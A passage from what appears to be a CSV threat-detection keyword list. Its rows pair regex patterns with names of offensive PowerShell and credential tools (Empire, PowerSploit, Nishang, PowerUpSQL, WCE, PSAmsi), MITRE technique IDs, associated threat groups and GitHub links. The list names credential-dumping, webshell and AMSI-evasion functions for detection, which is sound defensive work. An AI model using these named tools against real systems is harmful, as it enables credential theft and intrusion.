- T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46103" 
"*Get-LsaSecret *",".{0,1000}Get\-LsaSecret\s.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","46104" "*Get-LSASecret*",".{0,1000}Get\-LSASecret.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","46105" "*Get-LSASecret.ps1*",".{0,1000}Get\-LSASecret\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","46106" "*Get-LSASecret.ps1*",".{0,1000}Get\-LSASecret\.ps1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","46107" "*Get-LSASecrets.ps1*",".{0,1000}Get\-LSASecrets\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","46108" "*getlsasrvaddr.exe *",".{0,1000}getlsasrvaddr\.exe\s.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","N/A","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","46109" "*GetLSASRVaddresses v%s - (c) 2011 Hernan Ochoa*",".{0,1000}GetLSASRVaddresses\sv\%s\s\-\s\(c\)\s2011\sHernan\sOchoa.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts 
credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","#content","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","46110" "*Get-MinimallyObfuscated -ScriptPath *",".{0,1000}Get\-MinimallyObfuscated\s\-ScriptPath\s.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","46111" "*Get-ModifiableRegistryAutoRun*",".{0,1000}Get\-ModifiableRegistryAutoRun.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","PowerUp.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46112" "*Get-ModifiableRegistryAutoRun*",".{0,1000}Get\-ModifiableRegistryAutoRun.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46113" "*Get-ModifiableScheduledTaskFile*",".{0,1000}Get\-ModifiableScheduledTaskFile.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","PowerUp.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46114" "*Get-ModifiableScheduledTaskFile*",".{0,1000}Get\-ModifiableScheduledTaskFile.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46115" "*Get-ModifiableService*",".{0,1000}Get\-ModifiableService.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46116" "*Get-MSSQLAllCredentials*",".{0,1000}Get\-MSSQLAllCredentials.{0,1000}","offensive_tool_keyword","PowerUpSQL","NetSPI powershell modules to gather credentials","T1552.001 - T1555.004 - T1003","TA0006 - TA0009 - TA0010","N/A","Black Basta - Dispossessor","Credential Access","https://github.com/NetSPI/Powershell-Modules","1","0","N/A","N/A","10","2","168","101","2019-06-06T15:54:47Z","2014-02-28T21:24:21Z","46120" "*Get-MSSQLAllCredentials*",".{0,1000}Get\-MSSQLAllCredentials.{0,1000}","offensive_tool_keyword","PowerUpSQL","NetSPI powershell modules to gather credentials","T1552.001 - T1555.004 - T1003","TA0006 - TA0009 - TA0010","N/A","Black Basta - Dispossessor","Credential Access","https://github.com/NetSPI/Powershell-Modules","1","1","N/A","N/A","10","2","168","101","2019-06-06T15:54:47Z","2014-02-28T21:24:21Z","46121" "*Get-MSSQLCredentialPasswords*",".{0,1000}Get\-MSSQLCredentialPasswords.{0,1000}","offensive_tool_keyword","PowerUpSQL","NetSPI powershell modules to gather credentials","T1552.001 - T1555.004 - T1003","TA0006 - TA0009 - TA0010","N/A","Black Basta - Dispossessor","Credential 
Access","https://github.com/NetSPI/Powershell-Modules","1","1","N/A","N/A","10","2","168","101","2019-06-06T15:54:47Z","2014-02-28T21:24:21Z","46122" "*Get-MSSQLCredentialPasswords*",".{0,1000}Get\-MSSQLCredentialPasswords.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46123" "*Get-MSSQLLinkPasswords*",".{0,1000}Get\-MSSQLLinkPasswords.{0,1000}","offensive_tool_keyword","PowerUpSQL","NetSPI powershell modules to gather credentials","T1552.001 - T1555.004 - T1003","TA0006 - TA0009 - TA0010","N/A","Black Basta - Dispossessor","Credential Access","https://github.com/NetSPI/Powershell-Modules","1","1","N/A","N/A","10","2","168","101","2019-06-06T15:54:47Z","2014-02-28T21:24:21Z","46124" "*Get-NestedGroupMembership *",".{0,1000}Get\-NestedGroupMembership\s.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tool","https://github.com/gustanini/PowershellTools","1","0","N/A","N/A","10","1","76","13","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z","46125" 
"*Get-NestedGroupMembership.ps1*",".{0,1000}Get\-NestedGroupMembership\.ps1.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tool","https://github.com/gustanini/PowershellTools","1","1","N/A","N/A","10","1","76","13","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z","46126" "*Get-NetComputer -Unconstrainuser*",".{0,1000}Get\-NetComputer\s\-Unconstrainuser.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 
- FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46127" "*Get-NetDomainController*",".{0,1000}Get\-NetDomainController.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46128" "*Get-NetDomainTrust*",".{0,1000}Get\-NetDomainTrust.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46129" "*get-netfileserver -domain *",".{0,1000}get\-netfileserver\s\-domain\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","46130" "*Get-NetFileServer*",".{0,1000}Get\-NetFileServer.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46131" "*Get-NetFileServer*",".{0,1000}Get\-NetFileServer.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46132" "*Get-NetForestDomain*",".{0,1000}Get\-NetForestDomain.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46134" "*Get-NetGPO -UserIdentity *",".{0,1000}Get\-NetGPO\s\-UserIdentity\s.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46137" "*Get-NetGPOGroup*",".{0,1000}Get\-NetGPOGroup.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46138" "*Get-NetLocalGroup*",".{0,1000}Get\-NetLocalGroup.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46141" "*Get-NetLocalGroupMember*",".{0,1000}Get\-NetLocalGroupMember.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG 